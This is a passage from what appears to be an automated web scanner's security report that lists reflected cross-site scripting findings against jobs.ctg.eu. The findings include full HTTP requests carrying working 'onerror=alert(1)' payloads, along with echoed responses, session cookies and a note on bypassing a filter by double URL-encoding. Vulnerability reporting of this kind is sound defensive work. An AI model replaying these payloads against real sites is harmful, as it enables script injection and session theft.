X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:52:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-js-dependent.jsdb2bb"><img src=a onerror=alert(1)>d9d6098e8ef not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.92. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f was submitted in the REST URL parameter 1. This input was echoed as 72838"><img src=a onerror=alert(1)>b3d0a8fde2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f/all/modules/views_accordion/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:02:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:02:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites72838"><img src=a onerror=alert(1)>b3d0a8fde2f-all-modules-views-accordion-views-accordion.js not-front not-logged-in page-sites72838img-srca-onerroralert1b3d0a8fde2f no-sidebars">
...[SNIP]...

3.93. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36 was submitted in the REST URL parameter 2. This input was echoed as 1d572"><img src=a onerror=alert(1)>4fdbbcc7f36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36/modules/views_accordion/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:06:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:06:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all1d572"><img src=a onerror=alert(1)>4fdbbcc7f36-modules-views-accordion-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.94. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba was submitted in the REST URL parameter 3. This input was echoed as 3062d"><img src=a onerror=alert(1)>e573c228bba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba/views_accordion/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:09:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:09:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules3062d"><img src=a onerror=alert(1)>e573c228bba-views-accordion-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.95. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d15"style%3d"x%3aexpression(alert(1))"0106e014a15 was submitted in the REST URL parameter 3. This input was echoed as b7d15"style="x:expression(alert(1))"0106e014a15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /sites/all/modulesb7d15"style%3d"x%3aexpression(alert(1))"0106e014a15/views_accordion/views-accordion.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=c3ac5bd59bdef7174c64ca645b4969c1; expires=Sun, 15-May-2011 20:49:46 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:16:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesb7d15"style="x:expression(alert(1))"0106e014a15-views-accordion-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.96. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ea7"><img%20src%3da%20onerror%3dalert(1)>51ac2dadf1d was submitted in the REST URL parameter 4. This input was echoed as 21ea7"><img src=a onerror=alert(1)>51ac2dadf1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views_accordion21ea7"><img%20src%3da%20onerror%3dalert(1)>51ac2dadf1d/views-accordion.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:18:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=26b01c34283a8c185613e700eb7d109e; expires=Sun, 15-May-2011 20:51:53 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:18:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-accordion21ea7"><img src=a onerror=alert(1)>51ac2dadf1d-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.97. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4 was submitted in the REST URL parameter 4. This input was echoed as d7030"><img src=a onerror=alert(1)>75e7ac5c8f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/modules/views_accordiond7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:12:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:12:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-accordiond7030"><img src=a onerror=alert(1)>75e7ac5c8f4-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.98. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db was submitted in the REST URL parameter 5. This input was echoed as 18db4"><img src=a onerror=alert(1)>60208cc18db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views_accordion/views-accordion.js18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:15:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:15:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-accordion-views-accordion.js18db4"><img src=a onerror=alert(1)>60208cc18db not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.99. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114 was submitted in the REST URL parameter 1. This input was echoed as b0e6e"><img src=a onerror=alert(1)>a95dd8a114 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesb0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114/all/themes/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesb0e6e"><img src=a onerror=alert(1)>a95dd8a114-all-themes-threesixty-css-content.css not-front not-logged-in page-sitesb0e6eimg-srca-onerroralert1a95dd8a114 no-sidebars">
...[SNIP]...

3.100. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81 was submitted in the REST URL parameter 2. This input was echoed as c1af7"><img src=a onerror=alert(1)>fc22992ed81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allc1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81/themes/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allc1af7"><img src=a onerror=alert(1)>fc22992ed81-themes-threesixty-css-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.101. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433 was submitted in the REST URL parameter 3. This input was echoed as 1f0ed"><img src=a onerror=alert(1)>710145aa433 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes1f0ed"><img src=a onerror=alert(1)>710145aa433-threesixty-css-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.102. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae was submitted in the REST URL parameter 4. This input was echoed as 189af"><img src=a onerror=alert(1)>73e9826e1ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty189af"><img src=a onerror=alert(1)>73e9826e1ae-css-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.103. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b was submitted in the REST URL parameter 5. This input was echoed as 6646f"><img src=a onerror=alert(1)>d04b41f719b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css6646f"><img src=a onerror=alert(1)>d04b41f719b-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.104. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

